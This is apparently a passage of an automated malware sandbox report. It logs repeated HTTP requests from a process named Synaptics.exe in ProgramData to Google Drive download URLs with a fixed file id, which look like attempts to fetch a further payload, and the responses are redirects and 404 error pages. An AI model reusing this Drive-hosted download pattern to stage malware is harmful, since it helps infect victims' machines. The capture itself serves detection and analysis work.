                                                                                                                                      2024-12-30 10:23:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      82192.168.2.549899142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:28 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5gW68JiHyKqt-DQkT8jRhES9JdVAbKZSuObf5DLyuq6yJX7lVJ3GO_5nU5JRNHo-Lh
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:28 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4AU1pTYZl405Zu85GtCLDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:28 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:28 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 35 31 4b 76 4b 6b 45 63 30 54 70 51 65 74 33 43 6f 55 51 33 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="v51KvKkEc0TpQet3CoUQ3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:28 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      83192.168.2.549905142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:28 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      84192.168.2.549906142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:28 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      85192.168.2.549907142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      86192.168.2.549916142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:30 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Qto9OP0YPjT3lbG-CRBD3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      87192.168.2.549915142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:30 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-GEHirKss7893W4K64XEO1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      88192.168.2.549924142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-R87Ytymu0Tjax35ZAPPq8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      89192.168.2.549925142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:31 UTC1242INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7hJMt4oSp2IxZFnYnEtaRuxCb5r-4375Tq40RwTgXsDV3Hub6upU6SlNqkR7bS_YA
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_JcuSFna3hBFD-RJiBhzJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:31 UTC148INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                                                                      2024-12-30 10:23:31 UTC1390INData Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 36 4f 30 66 49 77 69 66 35 68 79 59 36 75 59 75 55 37 6d 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a
                                                                                                                                      Data Ascii: Found)!!1</title><style nonce="T6O0fIwif5hyY6uYuU7mdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                                                                      2024-12-30 10:23:31 UTC114INData Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      90192.168.2.549930142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:31 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5UUxZqRUPDo_pyCXd14vXOoJJVgQCgWSjlpHRiBvt4fYZstKPd0nZ8T0E5L-8DuAKk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:31 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-dbZHivfAaM3-m_kwhVXF3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:31 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:31 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 4e 6b 33 7a 55 56 35 33 68 71 54 61 45 64 32 53 4f 31 2d 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="WNk3zUV53hqTaEd2SO1-_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:31 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      91192.168.2.549931142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
